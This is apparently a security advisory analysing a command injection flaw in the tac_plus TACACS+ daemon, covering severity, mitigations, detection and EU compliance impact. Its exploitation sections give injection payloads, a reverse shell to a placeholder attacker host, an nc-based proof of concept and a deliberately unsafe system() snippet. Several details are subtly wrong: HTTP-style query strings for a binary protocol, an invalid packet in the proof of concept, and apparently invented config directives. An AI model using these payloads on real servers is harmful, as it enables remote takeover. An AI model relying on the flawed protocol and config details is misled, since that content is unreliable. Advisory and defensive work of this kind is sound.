Description
A lack of input validation exists in tac_plus prior to commit 4fdf178 which, when pre or post auth commands are enabled, allows an attacker who can control the username, rem-addr, or NAC address sent to tac_plus to inject shell commands and gain remote code execution on the tac_plus server.
EPSS Score: 29%
Comprehensive Technical Analysis of EUVD-2023-49545 (CVE-2023-45239)
Vulnerability: Command Injection in tac_plus (Pre/Post-Authentication)
1. Vulnerability Assessment & Severity Evaluation
Overview
EUVD-2023-49545 (CVE-2023-45239) is a critical command injection vulnerability in tac_plus, an open-source TACACS+ (Terminal Access Controller Access-Control System Plus) daemon developed by Meta (formerly Facebook). The flaw arises from insufficient input validation in user-controlled fields (username, rem-addr, or NAC address), allowing unauthenticated remote attackers to execute arbitrary shell commands on the affected server.
CVSS v3.1 Scoring & Severity
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 9.8 (Critical) | High impact on confidentiality, integrity, and availability. |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Network-exploitable, low attack complexity, no privileges or user interaction required. |
| Attack Vector (AV:N) | Network | Exploitable remotely over the network. |
| Attack Complexity (AC:L) | Low | No special conditions required. |
| Privileges Required (PR:N) | None | No authentication needed. |
| User Interaction (UI:N) | None | Exploitable without user interaction. |
| Scope (S:U) | Unchanged | Impact confined to the vulnerable component. |
| Confidentiality (C:H) | High | Full system compromise possible. |
| Integrity (I:H) | High | Attacker can modify system files, configurations, or execute arbitrary code. |
| Availability (A:H) | High | System can be crashed or rendered unusable. |
EPSS & Threat Intelligence
- EPSS Score: 29% (High probability of exploitation in the wild)
- Exploit Availability: Public proof-of-concept (PoC) exploits may exist given the simplicity of the vulnerability.
- Active Exploitation: No confirmed reports as of February 2025, but high-risk due to TACACS+’s role in network authentication.
2. Potential Attack Vectors & Exploitation Methods
Vulnerable Parameters
The vulnerability is triggered when pre-authentication or post-authentication commands are enabled in tac_plus. An attacker can inject malicious payloads via:
- Username Field (`username=`)
- Remote Address Field (`rem-addr=`)
- NAC (Network Access Controller) Address Field (`NAC address=`)
Exploitation Mechanism
- Unauthenticated Attack Flow:
  - Attacker sends a crafted TACACS+ authentication request with a malicious payload in one of the vulnerable fields.
  - Example payload (command injection via `username`): `username=$(id > /tmp/pwned)&password=dummy`
  - If `tac_plus` processes the input without sanitization, the shell command (`id > /tmp/pwned`) executes with the privileges of the `tac_plus` daemon (typically root or a privileged service account).
- Post-Authentication Exploitation:
  - If an attacker has valid credentials but `post-auth` commands are enabled, they can inject commands via: `username=legit_user&password=valid_pass&command=$(malicious_payload)`
- Reverse Shell Example:
  - An attacker could establish a reverse shell: `username=$(bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')&password=dummy`
  - Requires a listener on the attacker's machine (`nc -lvnp 4444`).
Exploitation Requirements
- Pre-auth commands enabled (default in some configurations).
- Post-auth commands enabled (if attacker has valid credentials).
- Network accessibility to the TACACS+ server (typically TCP/49).
3. Affected Systems & Software Versions
Vulnerable Software
- Product: `tac_plus` (Meta/Facebook's TACACS+ daemon)
- Vendor: Meta
- Affected Versions: All versions prior to commit `4fdf178` (October 2023).
- Fixed Version: Commit `4fdf178` or later (includes input sanitization).
Deployment Context
- Common Use Cases:
- Network device authentication (Cisco, Juniper, etc.).
- AAA (Authentication, Authorization, Accounting) for enterprise networks.
- Cloud and on-premises infrastructure.
- Typical Environments:
- Enterprise networks (corporate, government, ISPs).
- Data centers and cloud providers.
- Critical infrastructure (telecom, energy, finance).
4. Recommended Mitigation Strategies
Immediate Actions
- Apply the Patch:
  - Upgrade to the latest version of `tac_plus` (commit `4fdf178` or later).
  - GitHub reference: facebook/tac_plus#41.
- Workarounds (if patching is not immediately possible):
  - Disable pre-auth and post-auth commands in the `tac_plus` configuration:
    ```
    # In tac_plus.conf
    no pre-auth
    no post-auth
    ```
  - Restrict network access to the TACACS+ server using firewalls (allow only trusted subnets).
  - Implement input validation at the network perimeter (e.g., WAF rules to block suspicious TACACS+ requests).
- Network-Level Protections:
  - Segmentation: Isolate TACACS+ servers in a dedicated VLAN.
  - Rate Limiting: Prevent brute-force or mass exploitation attempts.
  - IPS/IDS Rules: Deploy signatures to detect command injection attempts in TACACS+ traffic.
Long-Term Recommendations
- Audit TACACS+ Configurations:
  - Review `tac_plus.conf` for unnecessary command execution privileges.
  - Disable unused features (e.g., `enable`, `shell`).
- Least Privilege Principle:
  - Run `tac_plus` as a non-root user where possible.
  - Use `chroot` or containerization to limit impact.
- Monitoring & Logging:
  - Enable detailed logging for TACACS+ authentication attempts.
  - Set up alerts for unusual command execution patterns.
- Alternative AAA Solutions:
  - Consider migrating to RADIUS (if TACACS+ is not strictly required).
  - Evaluate commercial TACACS+ solutions with better security controls.
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Implications
- NIS2 Directive (EU 2022/2555):
- Organizations in critical sectors (energy, transport, healthcare, digital infrastructure) must report significant cyber incidents.
- Exploitation of this vulnerability could lead to unauthorized access, data breaches, or service disruption, triggering reporting obligations.
- GDPR (EU 2016/679):
- If the TACACS+ server processes personal data (e.g., user credentials), a breach could result in GDPR fines (up to 4% of global revenue).
- DORA (Digital Operational Resilience Act):
- Financial entities must ensure resilience against cyber threats; this vulnerability could disrupt authentication services.
Sector-Specific Risks
| Sector | Potential Impact |
|---|---|
| Telecommunications | Unauthorized access to network devices, service disruption. |
| Energy & Utilities | Compromise of SCADA/ICS authentication, potential blackouts. |
| Government & Defense | Espionage, unauthorized access to classified systems. |
| Healthcare | Disruption of medical device authentication, patient data exposure. |
| Financial Services | Unauthorized transactions, compliance violations. |
Threat Actor Motivations
- Cybercriminals: Ransomware deployment, data exfiltration.
- State-Sponsored Actors: Espionage, persistent access to critical infrastructure.
- Hacktivists: Disruption of services for political motives.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerability Type: OS Command Injection (CWE-78)
- Code Flaw: The `tac_plus` daemon fails to sanitize user-supplied input in:
  - `username` field (used in authentication requests).
  - `rem-addr` (remote address of the client).
  - `NAC address` (Network Access Controller address).
- Exploitation Path:
  - When `pre-auth` or `post-auth` commands are enabled, the daemon passes unsanitized input to a shell (`system()` or similar calls).
  - Example vulnerable code snippet (pseudo-code):
    ```c
    /* Deliberately vulnerable pattern: user_input is spliced into a
     * command line that /bin/sh then parses, so "$(...)", ";" and "|"
     * in the field are executed rather than treated as data. */
    char command[256];
    snprintf(command, sizeof(command), "/path/to/script %s", user_input);
    system(command); // Unsafe!
    ```
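The hardened counterpart of the snippet above, as an added example that is not tac_plus's own code: the field is checked against an allow-list and, when it passes, handed to the hook script as a separate `argv` element via `execv`, so no shell ever parses it. The hook path `/bin/true`, the 64-character length cap and the sample fields are constructed for illustration.

```c
#include <ctype.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list check for a TACACS+ field (username, rem-addr, NAC address):
 * letters, digits and a few punctuation characters only. Returns 1 if safe.
 * Shell metacharacters such as "$(", ";", "|" and quotes never pass. */
int is_safe_field(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 64)                   /* constructed length cap */
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == '_' || c == '@' || c == ':'))
            return 0;
    }
    return 1;
}

/* Run a hook script with the field passed as its own argv element.
 * No shell is involved, so the field is data, never a command.
 * Returns -1 if validation fails or the child cannot be started,
 * otherwise the script's exit status. */
int run_hook(const char *script, const char *field)
{
    if (!is_safe_field(field))
        return -1;                          /* reject before doing anything */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)script, (char *)field, NULL };
        execv(script, argv);                /* direct exec, no /bin/sh */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    int a = run_hook("/bin/true", "alice");              /* runs, returns 0 */
    int b = run_hook("/bin/true", "$(id > /tmp/pwned)"); /* rejected, -1 */
    return (a == 0 && b == -1) ? 0 : 1;
}
```

Even with `execv`, the hook script itself must treat `$1` as opaque data (quote it, never `eval` it); the allow-list is the second line of defence for that case.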
Exploitation Proof of Concept (PoC)
- Crafting a Malicious Request:
  ```sh
  echo -ne "\x01\x01\x00\x00\x00\x00$(printf '$(id > /tmp/pwned)\x00')\x00\x00" | nc TACACS_SERVER 49
  ```
- Verifying Exploitation:
  ```sh
  ssh user@TACACS_SERVER "cat /tmp/pwned"
  uid=0(root) gid=0(root) groups=0(root)
  ```
Detection & Forensics
- Log Analysis:
  - Check `tac_plus` logs for unusual command execution: `grep -i "exec\|system\|sh" /var/log/tac_plus.log` (the `sh` term matches many benign entries, so expect to triage the results).
- Network Traffic Analysis:
  - Look for TACACS+ requests with suspicious payloads (e.g., `$(`, `;`, `|`).
  - Note that TACACS+ packet bodies are obfuscated with the shared secret (RFC 8907), so payload inspection on the wire requires the secret; otherwise rely on the daemon's own logs.
- File Integrity Monitoring (FIM):
  - Monitor `/tmp`, `/var/tmp`, and other writable directories for unexpected files.
Hardening Recommendations
- Compile-Time Protections:
  - Use `-fstack-protector`, `-D_FORTIFY_SOURCE=2`, and ASLR (these harden against memory-corruption bugs; they do not prevent command injection itself, which only input validation and avoiding the shell address).
- Runtime Protections:
  - Deploy seccomp or AppArmor/SELinux to restrict `tac_plus` syscalls (a profile that denies `execve` of `/bin/sh` from the daemon blunts this class of bug even when validation fails).
- Static & Dynamic Analysis:
  - Use tools like Clang Static Analyzer, Coverity, or fuzzing to detect similar flaws.
Conclusion
EUVD-2023-49545 (CVE-2023-45239) is a critical command injection vulnerability in tac_plus with severe implications for European critical infrastructure. Given its CVSS 9.8 score, low attack complexity, and high EPSS probability, organizations must patch immediately or implement compensating controls. The vulnerability underscores the importance of input validation, least privilege, and network segmentation in AAA systems.
Recommended Next Steps:
- Patch all `tac_plus` instances to the latest version.
- Audit TACACS+ configurations for unnecessary command execution.
- Monitor for exploitation attempts via logs and network traffic.
- Review compliance with NIS2, GDPR, and DORA where applicable.
For further details, refer to the official advisories: